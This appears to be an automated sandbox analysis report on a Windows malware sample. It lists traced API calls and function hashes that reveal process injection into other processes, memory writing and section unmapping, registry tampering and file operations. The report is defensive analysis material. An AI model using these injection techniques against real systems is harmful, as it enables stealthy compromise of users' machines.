    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 0.exe Analysis ID: 65738

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:8905AD755F4CDCD7C4AF3FD546F67BFC
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:65738
Initial sample SHA 256:41F89827217F8749BBD170FDEBE998922F40CCF43225BAEF9395DB8A70D056C4
Initial sample name:.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
